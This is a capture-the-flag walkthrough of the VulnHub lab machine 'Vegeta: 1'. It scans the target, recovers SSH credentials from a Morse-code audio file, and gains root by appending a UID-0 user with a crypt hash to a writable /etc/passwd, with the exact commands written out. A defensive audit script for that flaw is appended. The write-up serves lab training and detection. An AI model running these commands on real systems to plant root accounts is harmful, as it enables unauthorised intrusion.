vulnhub Vegeta: 1

2022-06-24 22:47:00 Fairy elephant

Penetration approach:

nmap scan ---- gobuster scan of the website directories ---- decode the Morse code online to obtain the ssh username and password ---- write a new user to /etc/passwd for privilege escalation

Environment information:

Target machine: 192.168.101.77

Attack machine: 192.168.101.34

Specific steps:

1. nmap scan

sudo nmap -sV -sC -p- 192.168.101.77

2. dirb scan of the website directories (rabbit hole)

dirb http://192.168.101.77

The scan finds http://192.168.101.77/robots.txt

(What follows is a rabbit hole.)

Open http://192.168.101.77/robots.txt in a browser, which reveals /find_me

Open /find_me in the browser, click find_me.html, and view the page source

view-source:http://192.168.101.77/find_me/find_me.html

Scroll to the bottom and find a large comment (not pasted here)

After base64 decoding it is still a pile of meaningless garbage, so this path is a dead end

3. gobuster scan of the website directories

gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

The scan finds /bulma

http://192.168.101.77/bulma/ is a directory listing that contains one file, hahahaha.wav

Download it and listen to it; it sounds like Morse code

4. Decode the Morse code online to obtain the ssh username and password

Found an online decoder: Morse Code Audio Decoder | Morse Code World

Click upload to upload hahahaha.wav, then press play; the audio is automatically converted to text

The result is:

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

Log in over ssh with username trunks and password u$3r

ssh trunks@192.168.101.77

5. Privilege escalation by writing a new user to /etc/passwd

Look at /home/trunks/.bash_history and find commands that write a new user to /etc/passwd

Check the file permissions of /etc/passwd

ls -al /etc/passwd

The trunks user has write permission on the file

Following the commands in /home/trunks/.bash_history, first use perl to generate the encrypted user password

perl -le 'print crypt("123456","addedsalt")'

In the command above, the user's plaintext password is 123456

Then write the new user test to /etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

Finally, switch to the test user and enter the password 123456 to get root privileges; root.txt is in the /root directory

su - test
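
A defensive check for the misconfiguration used in step 5, added here as an example (it is not part of the original write-up): it flags passwd entries that have UID 0 under a name other than root or that carry a hash in the password field, and a passwd file that is not owned by root or is writable by group or others. The function names and the sample file are constructed for illustration; the test line in the sample is the one appended above.

```shell
#!/bin/sh
# Added example: audit for the /etc/passwd conditions abused in step 5.

# Print one finding per suspicious entry in the passwd-format file $1.
audit_passwd_entries() {
    awk -F: '
        /^#/ || NF == 0 { next }                       # skip comments and blank lines
        $3 == 0 && $1 != "root" { print "UID0", $1 }   # extra superuser account
        # Field 2 should be "x" (hash kept in /etc/shadow) or a lock marker.
        $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            kind = ($2 == "") ? "EMPTYPW" : "INLINEHASH"
            print kind, $1
        }
    ' "$1"
}

# Print a finding if file $1 is not owned by root or is group/world writable.
audit_passwd_perms() {
    if [ -n "$(find "$1" -prune ! -user root)" ]; then
        echo "OWNER-NOT-ROOT $1"
    fi
    if [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \))" ]; then
        echo "WRITABLE-BY-GROUP-OR-OTHER $1"
    fi
}

# Constructed sample: three ordinary entries plus the line appended in step 5.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks:/home/trunks:/bin/bash
test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash
EOF
}

# Demo on the sample; on a real host run both functions against /etc/passwd.
sample=$(mktemp)
write_sample_passwd "$sample"
audit_passwd_entries "$sample"
rm -f "$sample"
```

On a correctly configured host both functions print nothing for /etc/passwd, which is normally owned by root with mode 644.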
